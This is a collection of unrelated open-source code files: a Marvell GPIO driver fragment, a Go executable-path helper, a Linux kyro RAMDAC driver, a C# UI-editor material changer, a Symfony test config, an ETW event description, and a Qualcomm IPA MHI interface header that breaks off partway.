EXAMPLE: * Get GPP8 and GPP15 value. * mvGppPolarityGet(0, (GPP8 | GPP15)); * * RETURN: * 32bit value that describes GPP polatity mode per pin. * *******************************************************************************/ MV_U32 mvGppPolarityGet(MV_U32 group, MV_U32 mask) { MV_U32 regVal; if (group >= MV_GPP_MAX_GROUP) { DB(mvOsPrintf("mvGppActiveSet: Error invalid group number \n")); return MV_ERROR; } regVal = MV_REG_READ(GPP_DATA_IN_POL_REG(group)); return (regVal & mask); } /******************************************************************************* * mvGppValueGet - Get a GPP Pin list value. * * DESCRIPTION: * This function get GPP value. * * INPUT: * group - GPP group number * mask - 32bit mask value. Each set bit in the mask means that the * returned value is valid for it. * * OUTPUT: * None. * * EXAMPLE: * Get GPP8 and GPP15 value. * mvGppValueGet(0, (GPP8 | GPP15)); * * RETURN: * 32bit value that describes GPP activity mode per pin. * *******************************************************************************/ MV_U32 mvGppValueGet(MV_U32 group, MV_U32 mask) { MV_U32 gppData; gppData = MV_REG_READ(GPP_DATA_IN_REG(group)); gppData &= mask; return gppData; } /******************************************************************************* * mvGppValueSet - Set a GPP Pin list value. * * DESCRIPTION: * This function set value for given GPP pin list. * * INPUT: * group - GPP group number * mask - 32bit mask value. Each set bit in the mask means that the * value of corresponding GPP will be set accordingly. Other GPP * are not affected. * value - 32bit value that describes GPP value per pin. * * OUTPUT: * None. * * EXAMPLE: * Set GPP8 value of '0' and GPP15 value of '1'. * mvGppActiveSet(0, (GPP8 | GPP15), ((0 & GPP8) | (GPP15)) ); * * RETURN: * None. * *******************************************************************************/ MV_STATUS mvGppValueSet (MV_U32 group, MV_U32 mask, MV_U32 value) { MV_U32 outEnable, tmp; MV_U32 i; if (group >= MV_GPP_MAX_GROUP) { DB(mvOsPrintf("mvGppValueSet: Error invalid group number \n")); return MV_BAD_PARAM; } /* verify that the gpp pin is configured as output */ /* Note that in the register out enabled -> bit = '0'. */ outEnable = ~MV_REG_READ(GPP_DATA_OUT_EN_REG(group)); /* Workaround for Erratum FE-MISC-70*/ if(mvCtrlRevGet()==MV_88F6XXX_A0_REV && (group == 1)) { tmp = ~MV_REG_READ(GPP_DATA_OUT_EN_REG(0)); outEnable &= 0xfffffffd; outEnable |= (tmp & 0x2); } /*End of WA*/ for (i = 0 ; i < 32 ;i++) { if (((mask & (1 << i)) & (outEnable & (1 << i))) != (mask & (1 << i))) { mvOsPrintf("mvGppValueSet: Err. An attempt to set output "\ "value to GPP %d in input mode.\n", i); return MV_ERROR; } } gppRegSet(group, GPP_DATA_OUT_REG(group), mask, value); return MV_OK; } /******************************************************************************* * gppRegSet - Set a specific GPP pin on a specific GPP register * * DESCRIPTION: * This function set a specific GPP pin on a specific GPP register * * INPUT: * regOffs - GPP Register offset * group - GPP group number * mask - 32bit mask value. Each set bit in the mask means that the * value of corresponding GPP will be set accordingly. Other GPP * are not affected. * value - 32bit value that describes GPP value per pin. * * OUTPUT: * None. * * EXAMPLE: * Set GPP8 value of '0' and GPP15 value of '1'. * mvGppActiveSet(0, (GPP8 | GPP15), ((0 & GPP8) | (1 & GPP15)) ); * * RETURN: * None. * *******************************************************************************/ static MV_VOID gppRegSet (MV_U32 group, MV_U32 regOffs,MV_U32 mask,MV_U32 value) { MV_U32 gppData; gppData = MV_REG_READ(regOffs); gppData &= ~mask; gppData |= (value & mask); MV_REG_WRITE(regOffs, gppData); }
{ "pile_set_name": "Github" }
// Copyright 2012 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // +build linux netbsd openbsd package osext import ( "errors" "os" "runtime" ) func executable() (string, error) { switch runtime.GOOS { case "linux": return os.Readlink("/proc/self/exe") case "netbsd": return os.Readlink("/proc/curproc/exe") case "openbsd": return os.Readlink("/proc/curproc/file") } return "", errors.New("ExecPath not implemented for " + runtime.GOOS) }
{ "pile_set_name": "Github" }
/* * linux/drivers/video/kyro/STG4000Ramdac.c * * Copyright (C) 2002 STMicroelectronics * * This file is subject to the terms and conditions of the GNU General Public * License. See the file COPYING in the main directory of this archive * for more details. */ #include <linux/kernel.h> #include <linux/errno.h> #include <linux/types.h> #include <video/kyro.h> #include "STG4000Reg.h" #include "STG4000Interface.h" static u32 STG_PIXEL_BUS_WIDTH = 128; /* 128 bit bus width */ static u32 REF_CLOCK = 14318; int InitialiseRamdac(volatile STG4000REG __iomem * pSTGReg, u32 displayDepth, u32 displayWidth, u32 displayHeight, s32 HSyncPolarity, s32 VSyncPolarity, u32 * pixelClock) { u32 tmp = 0; u32 F = 0, R = 0, P = 0; u32 stride = 0; u32 ulPdiv = 0; u32 physicalPixelDepth = 0; /* Make sure DAC is in Reset */ tmp = STG_READ_REG(SoftwareReset); if (tmp & 0x1) { CLEAR_BIT(1); STG_WRITE_REG(SoftwareReset, tmp); } /* Set Pixel Format */ tmp = STG_READ_REG(DACPixelFormat); CLEAR_BITS_FRM_TO(0, 2); /* Set LUT not used from 16bpp to 32 bpp ??? */ CLEAR_BITS_FRM_TO(8, 9); switch (displayDepth) { case 16: { physicalPixelDepth = 16; tmp |= _16BPP; break; } case 32: { /* Set for 32 bits per pixel */ physicalPixelDepth = 32; tmp |= _32BPP; break; } default: return -EINVAL; } STG_WRITE_REG(DACPixelFormat, tmp); /* Workout Bus transfer bandwidth according to pixel format */ ulPdiv = STG_PIXEL_BUS_WIDTH / physicalPixelDepth; /* Get Screen Stride in pixels */ stride = displayWidth; /* Set Primary size info */ tmp = STG_READ_REG(DACPrimSize); CLEAR_BITS_FRM_TO(0, 10); CLEAR_BITS_FRM_TO(12, 31); tmp |= ((((displayHeight - 1) << 12) | (((displayWidth / ulPdiv) - 1) << 23)) | (stride / ulPdiv)); STG_WRITE_REG(DACPrimSize, tmp); /* Set Pixel Clock */ *pixelClock = ProgramClock(REF_CLOCK, *pixelClock, &F, &R, &P); /* Set DAC PLL Mode */ tmp = STG_READ_REG(DACPLLMode); CLEAR_BITS_FRM_TO(0, 15); /* tmp |= ((P-1) | ((F-2) << 2) | ((R-2) << 11)); */ tmp |= ((P) | ((F - 2) << 2) | ((R - 2) << 11)); STG_WRITE_REG(DACPLLMode, tmp); /* Set Prim Address */ tmp = STG_READ_REG(DACPrimAddress); CLEAR_BITS_FRM_TO(0, 20); CLEAR_BITS_FRM_TO(20, 31); STG_WRITE_REG(DACPrimAddress, tmp); /* Set Cursor details with HW Cursor disabled */ tmp = STG_READ_REG(DACCursorCtrl); tmp &= ~SET_BIT(31); STG_WRITE_REG(DACCursorCtrl, tmp); tmp = STG_READ_REG(DACCursorAddr); CLEAR_BITS_FRM_TO(0, 20); STG_WRITE_REG(DACCursorAddr, tmp); /* Set Video Window */ tmp = STG_READ_REG(DACVidWinStart); CLEAR_BITS_FRM_TO(0, 10); CLEAR_BITS_FRM_TO(16, 26); STG_WRITE_REG(DACVidWinStart, tmp); tmp = STG_READ_REG(DACVidWinEnd); CLEAR_BITS_FRM_TO(0, 10); CLEAR_BITS_FRM_TO(16, 26); STG_WRITE_REG(DACVidWinEnd, tmp); /* Set DAC Border Color to default */ tmp = STG_READ_REG(DACBorderColor); CLEAR_BITS_FRM_TO(0, 23); STG_WRITE_REG(DACBorderColor, tmp); /* Set Graphics and Overlay Burst Control */ STG_WRITE_REG(DACBurstCtrl, 0x0404); /* Set CRC Trigger to default */ tmp = STG_READ_REG(DACCrcTrigger); CLEAR_BIT(0); STG_WRITE_REG(DACCrcTrigger, tmp); /* Set Video Port Control to default */ tmp = STG_READ_REG(DigVidPortCtrl); CLEAR_BIT(8); CLEAR_BITS_FRM_TO(16, 27); CLEAR_BITS_FRM_TO(1, 3); CLEAR_BITS_FRM_TO(10, 11); STG_WRITE_REG(DigVidPortCtrl, tmp); return 0; } /* Ramdac control, turning output to the screen on and off */ void DisableRamdacOutput(volatile STG4000REG __iomem * pSTGReg) { u32 tmp; /* Disable DAC for Graphics Stream Control */ tmp = (STG_READ_REG(DACStreamCtrl)) & ~SET_BIT(0); STG_WRITE_REG(DACStreamCtrl, tmp); } void EnableRamdacOutput(volatile STG4000REG __iomem * pSTGReg) { u32 tmp; /* Enable DAC for Graphics Stream Control */ tmp = (STG_READ_REG(DACStreamCtrl)) | SET_BIT(0); STG_WRITE_REG(DACStreamCtrl, tmp); }
{ "pile_set_name": "Github" }
using DeltaEngine.Content; using DeltaEngine.Graphics; using DeltaEngine.Rendering2D; using DeltaEngine.Scenes.Controls; namespace DeltaEngine.Editor.UIEditor { public class ControlMaterialChanger { public ControlMaterialChanger(UIEditorScene uiEditorScene) { this.uiEditorScene = uiEditorScene; } private readonly UIEditorScene uiEditorScene; public void ChangeMaterial(string newMaterialName) { foreach (Entity2D entity2D in uiEditorScene.SelectedEntity2DList) { var material = ContentLoader.Load<Material>(newMaterialName); if (entity2D == null) return; if (entity2D.GetType() == typeof(Button) || entity2D.GetType() == typeof(InteractiveButton)) entity2D.Get<Theme>().Button = ContentLoader.Load<Material>(newMaterialName); else if (entity2D.GetType() == typeof(Slider)) { entity2D.Get<Theme>().Slider = ContentLoader.Load<Material>(newMaterialName); entity2D.Get<Theme>().SliderDisabled = ContentLoader.Load<Material>(newMaterialName); } else if (entity2D.GetType() == typeof(Label)) { entity2D.Set(ContentLoader.Load<Material>(newMaterialName)); entity2D.Get<Theme>().Label = ContentLoader.Load<Material>(newMaterialName); entity2D.Set(ContentLoader.Load<Material>(newMaterialName).DefaultColor); } else entity2D.Set(material); uiEditorScene.uiControl.SetControlSize(entity2D, ContentLoader.Load<Material>(newMaterialName), uiEditorScene); var rect = entity2D.DrawArea; uiEditorScene.uiControl.EntityWidth = rect.Width; uiEditorScene.uiControl.EntityHeight = rect.Height; } } public void ChangeHoveredMaterial(string newMaterialName) { foreach (Entity2D entity2D in uiEditorScene.SelectedEntity2DList) { if (entity2D == null) return; if (entity2D.GetType() == typeof(Button) || entity2D.GetType() == typeof(InteractiveButton)) { var button = entity2D as Button; button.Get<Theme>().ButtonMouseover = ContentLoader.Load<Material>(newMaterialName); } else if (entity2D.GetType() == typeof(Slider)) { var slider = entity2D as Slider; slider.Get<Theme>().SliderPointerMouseover = ContentLoader.Load<Material>(newMaterialName); } } } public void ChangePressedMaterial(string newMaterialName) { foreach (Entity2D entity2D in uiEditorScene.SelectedEntity2DList) { if (entity2D == null) return; if (entity2D.GetType() == typeof(Button) || entity2D.GetType() == typeof(InteractiveButton)) { var button = entity2D as Button; button.Get<Theme>().ButtonPressed = ContentLoader.Load<Material>(newMaterialName); } else if (entity2D.GetType() == typeof(Slider)) { var slider = entity2D as Slider; slider.Get<Theme>().SliderPointer = ContentLoader.Load<Material>(newMaterialName); } } } public void ChangeDisabledMaterial(string newMaterialName) { foreach (Entity2D entity2D in uiEditorScene.SelectedEntity2DList) { if (entity2D == null) return; if (entity2D.GetType() == typeof(Button) || entity2D.GetType() == typeof(InteractiveButton)) { var button = entity2D as Button; button.Get<Theme>().ButtonDisabled = ContentLoader.Load<Material>(newMaterialName); } else if (entity2D.GetType() == typeof(Slider)) { var slider = entity2D as Slider; slider.Get<Theme>().SliderPointerDisabled = ContentLoader.Load<Material>(newMaterialName); } } } public static bool TryAddMaterial(string material) { try { var loadedMaterial = ContentLoader.Load<Material>(material); return !((ShaderWithFormat)loadedMaterial.Shader).Format.Is3D; } catch //ncrunch: no coverage start { return false; } //ncrunch: no coverage end } } }
{ "pile_set_name": "Github" }
imports: - { resource: "@SyliusCustomerBundle/test/app/config/parameters.yml" } framework: assets: false translator: { fallbacks: ["%locale%"] } secret: "%secret%" router: resource: "%kernel.project_dir%/app/config/routing.yml" form: ~ csrf_protection: true templating: engines: ['twig'] default_locale: "%locale%" session: handler_id: ~ storage_id: session.storage.mock_file http_method_override: true test: ~ twig: debug: "%kernel.debug%" strict_variables: "%kernel.debug%" doctrine: dbal: driver: "%database_driver%" path: "%database_path%" charset: UTF8 orm: entity_managers: default: auto_mapping: true fos_rest: view: formats: json: true empty_content: 204 format_listener: rules: - { path: '^/', priorities: ['json'], fallback_format: json, prefer_extension: true }
{ "pile_set_name": "Github" }
# Event 50090 - NetworkParameterStateEvent ###### Version: 0 ## Description None ## Data Dictionary |Standard Name|Field Name|Type|Description|Sample Value| |---|---|---|---|---| |TBD|ProcID|UInt32|None|`None`| |TBD|UniqueID|UInt32|None|`None`| |TBD|StatusCode|UInt32|None|`None`| ## Tags * etw_level_Informational * etw_opcode_ParamChangeNotification * etw_task_NetworkParameterStateEvent
{ "pile_set_name": "Github" }
/* Copyright (c) 2015, The Linux Foundation. All rights reserved. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 and * only version 2 as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. */ #include <linux/ipa.h> #include "ipa_i.h" /* MHI uC interface definitions */ #define IPA_HW_INTERFACE_MHI_VERSION 0x0004 #define IPA_HW_MAX_NUMBER_OF_CHANNELS 2 #define IPA_HW_MAX_NUMBER_OF_EVENTRINGS 2 #define IPA_HW_MAX_CHANNEL_HANDLE (IPA_HW_MAX_NUMBER_OF_CHANNELS-1) /** * Values that represent the MHI commands from CPU to IPA HW. * @IPA_CPU_2_HW_CMD_MHI_INIT: Initialize HW to be ready for MHI processing. * Once operation was completed HW shall respond with * IPA_HW_2_CPU_RESPONSE_CMD_COMPLETED. * @IPA_CPU_2_HW_CMD_MHI_INIT_CHANNEL: Initialize specific channel to be ready * to serve MHI transfers. Once initialization was completed HW shall * respond with IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE. * IPA_HW_MHI_CHANNEL_STATE_ENABLE * @IPA_CPU_2_HW_CMD_MHI_UPDATE_MSI: Update MHI MSI interrupts data. * Once operation was completed HW shall respond with * IPA_HW_2_CPU_RESPONSE_CMD_COMPLETED. * @IPA_CPU_2_HW_CMD_MHI_CHANGE_CHANNEL_STATE: Change specific channel * processing state following host request. Once operation was completed * HW shall respond with IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE. * @IPA_CPU_2_HW_CMD_MHI_DL_UL_SYNC_INFO: Info related to DL UL syncronization. * @IPA_CPU_2_HW_CMD_MHI_STOP_EVENT_UPDATE: Cmd to stop event ring processing. */ enum ipa_cpu_2_hw_mhi_commands { IPA_CPU_2_HW_CMD_MHI_INIT = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 0), IPA_CPU_2_HW_CMD_MHI_INIT_CHANNEL = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 1), IPA_CPU_2_HW_CMD_MHI_UPDATE_MSI = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 2), IPA_CPU_2_HW_CMD_MHI_CHANGE_CHANNEL_STATE = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 3), IPA_CPU_2_HW_CMD_MHI_DL_UL_SYNC_INFO = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 4), IPA_CPU_2_HW_CMD_MHI_STOP_EVENT_UPDATE = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 5) }; /** * Values that represent MHI related HW responses to CPU commands. * @IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE: Response to * IPA_CPU_2_HW_CMD_MHI_INIT_CHANNEL or * IPA_CPU_2_HW_CMD_MHI_CHANGE_CHANNEL_STATE commands. */ enum ipa_hw_2_cpu_mhi_responses { IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 0), }; /** * Values that represent MHI related HW event to be sent to CPU. * @IPA_HW_2_CPU_EVENT_MHI_CHANNEL_ERROR: Event specify the device detected an * error in an element from the transfer ring associated with the channel * @IPA_HW_2_CPU_EVENT_MHI_CHANNEL_WAKE_UP_REQUEST: Event specify a bam * interrupt was asserted when MHI engine is suspended */ enum ipa_hw_2_cpu_mhi_events { IPA_HW_2_CPU_EVENT_MHI_CHANNEL_ERROR = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 0), IPA_HW_2_CPU_EVENT_MHI_CHANNEL_WAKE_UP_REQUEST = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 1), }; /** * Channel error types. * @IPA_HW_CHANNEL_ERROR_NONE: No error persists. * @IPA_HW_CHANNEL_INVALID_RE_ERROR: Invalid Ring Element was detected */ enum ipa_hw_channel_errors { IPA_HW_CHANNEL_ERROR_NONE, IPA_HW_CHANNEL_INVALID_RE_ERROR }; /** * MHI error types. * @IPA_HW_INVALID_MMIO_ERROR: Invalid data read from MMIO space * @IPA_HW_INVALID_CHANNEL_ERROR: Invalid data read from channel context array * @IPA_HW_INVALID_EVENT_ERROR: Invalid data read from event ring context array * @IPA_HW_NO_ED_IN_RING_ERROR: No event descriptors are available to report on * secondary event ring * @IPA_HW_LINK_ERROR: Link error */ enum ipa_hw_mhi_errors { IPA_HW_INVALID_MMIO_ERROR = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 0), IPA_HW_INVALID_CHANNEL_ERROR = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 1), IPA_HW_INVALID_EVENT_ERROR = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 2), IPA_HW_NO_ED_IN_RING_ERROR = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 4), IPA_HW_LINK_ERROR = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 5), }; /** * Structure referring to the common and MHI section of 128B shared memory * located in offset zero of SW Partition in IPA SRAM. * The shared memory is used for communication between IPA HW and CPU. * @common: common section in IPA SRAM * @interfaceVersionMhi: The MHI interface version as reported by HW * @mhiState: Overall MHI state * @reserved_2B: reserved * @mhiCnl0State: State of MHI channel 0. * The state carries information regarding the error type. * See IPA_HW_MHI_CHANNEL_STATES. * @mhiCnl0State: State of MHI channel 1. * @mhiCnl0State: State of MHI channel 2. * @mhiCnl0State: State of MHI channel 3 * @mhiCnl0State: State of MHI channel 4. * @mhiCnl0State: State of MHI channel 5. * @mhiCnl0State: State of MHI channel 6. * @mhiCnl0State: State of MHI channel 7. * @reserved_37_34: reserved * @reserved_3B_38: reserved * @reserved_3F_3C: reserved */ struct IpaHwSharedMemMhiMapping_t { struct IpaHwSharedMemCommonMapping_t common; u16 interfaceVersionMhi; u8 mhiState; u8 reserved_2B; u8 mhiCnl0State; u8 mhiCnl1State; u8 mhiCnl2State; u8 mhiCnl3State; u8 mhiCnl4State; u8 mhiCnl5State; u8 mhiCnl6State; u8 mhiCnl7State; u32 reserved_37_34; u32 reserved_3B_38; u32 reserved_3F_3C; }; /** * Structure holding the parameters for IPA_CPU_2_HW_CMD_MHI_INIT command. * Parameters are sent as pointer thus should be reside in address accessible * to HW. * @msiAddress: The MSI base (in device space) used for asserting the interrupt * (MSI) associated with the event ring * mmioBaseAddress: The address (in device space) of MMIO structure in * host space * deviceMhiCtrlBaseAddress: Base address of the memory region in the device * address space where the MHI control data structures are allocated by * the host, including channel context array, event context array, * and rings. This value is used for host/device address translation. * deviceMhiDataBaseAddress: Base address of the memory region in the device * address space where the MHI data buffers are allocated by the host. * This value is used for host/device address translation. * firstChannelIndex: First channel ID. Doorbell 0 is mapped to this channel * firstEventRingIndex: First event ring ID. Doorbell 16 is mapped to this * event ring. */ struct IpaHwMhiInitCmdData_t { u32 msiAddress; u32 mmioBaseAddress; u32 deviceMhiCtrlBaseAddress; u32 deviceMhiDataBaseAddress; u32 firstChannelIndex; u32 firstEventRingIndex; }; /** * Structure holding the parameters for IPA_CPU_2_HW_CMD_MHI_INIT_CHANNEL * command. Parameters are sent as 32b immediate parameters. * @hannelHandle: The channel identifier as allocated by driver. * value is within the range 0 to IPA_HW_MAX_CHANNEL_HANDLE * @contexArrayIndex: Unique index for channels, between 0 and 255. The index is * used as an index in channel context array structures. * @bamPipeId: The BAM pipe number for pipe dedicated for this channel * @channelDirection: The direction of the channel as defined in the channel * type field (CHTYPE) in the channel context data structure. * @reserved: reserved. */ union IpaHwMhiInitChannelCmdData_t { struct IpaHwMhiInitChannelCmdParams_t { u32 channelHandle:8; u32 contexArrayIndex:8; u32 bamPipeId:6; u32 channelDirection:2; u32 reserved:8; } params; u32 raw32b; }; /** * Structure holding the parameters for IPA_CPU_2_HW_CMD_MHI_UPDATE_MSI command. * @msiAddress_low: The MSI lower base addr (in device space) used for asserting * the interrupt (MSI) associated with the event ring. * @msiAddress_hi: The MSI higher base addr (in device space) used for asserting * the interrupt (MSI) associated with the event ring. * @msiMask: Mask indicating number of messages assigned by the host to device * @msiData: Data Pattern to use when generating the MSI */ struct IpaHwMhiMsiCmdData_t { u32 msiAddress_low; u32 msiAddress_hi; u32 msiMask; u32 msiData; }; /** * Structure holding the parameters for * IPA_CPU_2_HW_CMD_MHI_CHANGE_CHANNEL_STATE command. * Parameters are sent as 32b immediate parameters. * @requestedState: The requested channel state as was indicated from Host. * Use IPA_HW_MHI_CHANNEL_STATES to specify the requested state * @channelHandle: The channel identifier as allocated by driver. * value is within the range 0 to IPA_HW_MAX_CHANNEL_HANDLE * @LPTransitionRejected: Indication that low power state transition was * rejected * @reserved: reserved */ union IpaHwMhiChangeChannelStateCmdData_t { struct IpaHwMhiChangeChannelStateCmdParams_t { u32 requestedState:8; u32 channelHandle:8; u32 LPTransitionRejected:8; u32 reserved:8; } params; u32 raw32b; }; /** * Structure holding the parameters for * IPA_CPU_2_HW_CMD_MHI_STOP_EVENT_UPDATE command. * Parameters are sent as 32b immediate parameters. * @channelHandle: The channel identifier as allocated by driver. * value is within the range 0 to IPA_HW_MAX_CHANNEL_HANDLE * @reserved: reserved */ union IpaHwMhiStopEventUpdateData_t { struct IpaHwMhiStopEventUpdateDataParams_t { u32 channelHandle:8; u32 reserved:24; } params; u32 raw32b; }; /** * Structure holding the parameters for * IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE response. * Parameters are sent as 32b immediate parameters. * @state: The new channel state. In case state is not as requested this is * error indication for the last command * @channelHandle: The channel identifier * @additonalParams: For stop: the number of pending bam descriptors currently * queued */ union IpaHwMhiChangeChannelStateResponseData_t { struct IpaHwMhiChangeChannelStateResponseParams_t { u32 state:8; u32 channelHandle:8; u32 additonalParams:16; } params; u32 raw32b; }; /** * Structure holding the parameters for * IPA_HW_2_CPU_EVENT_MHI_CHANNEL_ERROR event. * Parameters are sent as 32b immediate parameters. * @errorType: Type of error - IPA_HW_CHANNEL_ERRORS * @channelHandle: The channel identifier as allocated by driver. * value is within the range 0 to IPA_HW_MAX_CHANNEL_HANDLE * @reserved: reserved */ union IpaHwMhiChannelErrorEventData_t { struct IpaHwMhiChannelErrorEventParams_t { u32 errorType:8; u32 channelHandle:8; u32 reserved:16; } params; u32 raw32b; }; /** * Structure holding the parameters for * IPA_HW_2_CPU_EVENT_MHI_CHANNEL_WAKE_UP_REQUEST event. * Parameters are sent as 32b immediate parameters. * @channelHandle: The channel identifier as allocated by driver. * value is within the range 0 to IPA_HW_MAX_CHANNEL_HANDLE * @reserved: reserved */ union IpaHwMhiChannelWakeupEventData_t { struct IpaHwMhiChannelWakeupEventParams_t { u32 channelHandle:8; u32 reserved:24; } params; u32 raw32b; }; /** * Structure holding the MHI Common statistics * @numULDLSync: Number of times UL activity trigged due to DL activity * @numULTimerExpired: Number of times UL Accm Timer expired */ struct IpaHwStatsMhiCmnInfoData_t { u32 numULDLSync; u32 numULTimerExpired; u32 numChEvCtxWpRead; u32 reserved; }; /** * Structure holding the MHI Channel statistics * @doorbellInt: The number of doorbell int * @reProccesed: The number of ring elements processed * @bamFifoFull: Number of times Bam Fifo got full * @bamFifoEmpty: Number of times Bam Fifo got empty * @bamFifoUsageHigh: Number of times Bam fifo usage went above 75% * @bamFifoUsageLow: Number of times Bam fifo usage went below 25% * @bamInt: Number of BAM Interrupts * @ringFull: Number of times Transfer Ring got full * @ringEmpty: umber of times Transfer Ring got empty * @ringUsageHigh: Number of times Transfer Ring usage went above 75% * @ringUsageLow: Number of times Transfer Ring usage went below 25% * @delayedMsi: Number of times device triggered MSI to host after * Interrupt Moderation Timer expiry * @immediateMsi: Number of times device triggered MSI to host immediately * @thresholdMsi: Number of times device triggered MSI due to max pending * events threshold reached * @numSuspend: Number of times channel was suspended * @numResume: Number of times channel was suspended * @num_OOB: Number of times we indicated that we are OOB * @num_OOB_timer_expiry: Number of times we indicated that we are OOB * after timer expiry * @num_OOB_moderation_timer_start: Number of times we started timer after * sending OOB and hitting OOB again before we processed threshold * number of packets * @num_db_mode_evt: Number of times we indicated that we are in Doorbell mode */ struct IpaHwStatsMhiCnlInfoData_t { u32 doorbellInt; u32 reProccesed; u32 bamFifoFull; u32 bamFifoEmpty; u32 bamFifoUsageHigh; u32 bamFifoUsageLow; u32 bamInt; u32 ringFull; u32 ringEmpty; u32 ringUsageHigh; u32 ringUsageLow; u32 delayedMsi; u32 immediateMsi; u32 thresholdMsi; u32 numSuspend; u32 numResume; u32 num_OOB; u32 num_OOB_timer_expiry; u32 num_OOB_moderation_timer_start; u32 num_db_mode_evt; }; /** * Structure holding the MHI statistics * @mhiCmnStats: Stats pertaining to MHI * @mhiCnlStats: Stats pertaining to each channel */ struct IpaHwStatsMhiInfoData_t { struct IpaHwStatsMhiCmnInfoData_t mhiCmnStats; struct IpaHwStatsMhiCnlInfoData_t mhiCnlStats[ IPA_HW_MAX_NUMBER_OF_CHANNELS]; }; /** * Structure holding the MHI Common Config info * @isDlUlSyncEnabled: Flag to indicate if DL-UL synchronization is enabled * @UlAccmVal: Out Channel(UL) accumulation time in ms when DL UL Sync is * enabled * @ulMsiEventThreshold: Threshold at which HW fires MSI to host for UL events * @dlMsiEventThreshold: Threshold at which HW fires MSI to host for DL events */ struct IpaHwConfigMhiCmnInfoData_t { u8 isDlUlSyncEnabled; u8 UlAccmVal; u8 ulMsiEventThreshold; u8 dlMsiEventThreshold; }; /** * Structure holding the parameters for MSI info data * @msiAddress_low: The MSI lower base addr (in device space) used for asserting * the interrupt (MSI) associated with the event ring. * @msiAddress_hi: The MSI higher base addr (in device space) used for asserting * the interrupt (MSI) associated with the event ring. * @msiMask: Mask indicating number of messages assigned by the host to device * @msiData: Data Pattern to use when generating the MSI */ struct IpaHwConfigMhiMsiInfoData_t { u32 msiAddress_low; u32 msiAddress_hi; u32 msiMask; u32 msiData; }; /** * Structure holding the MHI Channel Config info * @transferRingSize: The Transfer Ring size in terms of Ring Elements * @transferRingIndex: The Transfer Ring channel number as defined by host * @eventRingIndex: The Event Ring Index associated with this Transfer Ring * @bamPipeIndex: The BAM Pipe associated with this channel * @isOutChannel: Indication for the direction of channel * @reserved_0: Reserved byte for maintaining 4byte alignment * @reserved_1: Reserved byte for maintaining 4byte alignment */ struct IpaHwConfigMhiCnlInfoData_t { u16 transferRingSize; u8 transferRingIndex; u8 eventRingIndex; u8 bamPipeIndex; u8 isOutChannel; u8 reserved_0; u8 reserved_1; }; /** * Structure holding the MHI Event Config info * @msiVec: msi vector to invoke MSI interrupt * @intmodtValue: Interrupt moderation timer (in milliseconds) * @eventRingSize: The Event Ring size in terms of Ring Elements * @eventRingIndex: The Event Ring number as defined by host * @reserved_0: Reserved byte for maintaining 4byte alignment * @reserved_1: Reserved byte for maintaining 4byte alignment * @reserved_2: Reserved byte for maintaining 4byte alignment */ struct IpaHwConfigMhiEventInfoData_t { u32 msiVec; u16 intmodtValue; u16 eventRingSize; u8 eventRingIndex; u8 reserved_0; u8 reserved_1; u8 reserved_2; }; /** * Structure holding the MHI Config info * @mhiCmnCfg: Common Config pertaining to MHI * @mhiMsiCfg: Config pertaining to MSI config * @mhiCnlCfg: Config pertaining to each channel * @mhiEvtCfg: Config pertaining to each event Ring */ struct IpaHwConfigMhiInfoData_t { struct IpaHwConfigMhiCmnInfoData_t mhiCmnCfg; struct IpaHwConfigMhiMsiInfoData_t mhiMsiCfg; struct IpaHwConfigMhiCnlInfoData_t mhiCnlCfg[ IPA_HW_MAX_NUMBER_OF_CHANNELS]; struct IpaHwConfigMhiEventInfoData_t mhiEvtCfg[ IPA_HW_MAX_NUMBER_OF_EVENTRINGS]; }; struct ipa_uc_mhi_ctx { u8 expected_responseOp; u32 expected_responseParams; void (*ready_cb)(void); void (*wakeup_request_cb)(void); u32 mhi_uc_stats_ofst; struct IpaHwStatsMhiInfoData_t *mhi_uc_stats_mmio; }; #define PRINT_COMMON_STATS(x) \ (nBytes += scnprintf(&dbg_buff[nBytes], size - nBytes, \ #x "=0x%x\n", ipa_uc_mhi_ctx->mhi_uc_stats_mmio->mhiCmnStats.x)) #define PRINT_CHANNEL_STATS(ch, x) \ (nBytes += scnprintf(&dbg_buff[nBytes], size - nBytes, \ #x "=0x%x\n", ipa_uc_mhi_ctx->mhi_uc_stats_mmio->mhiCnlStats[ch].x)) struct ipa_uc_mhi_ctx *ipa_uc_mhi_ctx; static int ipa_uc_mhi_response_hdlr(struct IpaHwSharedMemCommonMapping_t *uc_sram_mmio, u32 *uc_status) { IPADBG("responseOp=%d\n", uc_sram_mmio->responseOp); if (uc_sram_mmio->responseOp == ipa_uc_mhi_ctx->expected_responseOp && uc_sram_mmio->responseParams == ipa_uc_mhi_ctx->expected_responseParams) { *uc_status = 0; return 0; } return -EINVAL; } static void ipa_uc_mhi_event_hdlr(struct IpaHwSharedMemCommonMapping_t *uc_sram_mmio) { if (ipa_ctx->uc_ctx.uc_sram_mmio->eventOp == IPA_HW_2_CPU_EVENT_MHI_CHANNEL_ERROR) { union IpaHwMhiChannelErrorEventData_t evt; IPAERR("Channel error\n"); evt.raw32b = uc_sram_mmio->eventParams; IPAERR("errorType=%d 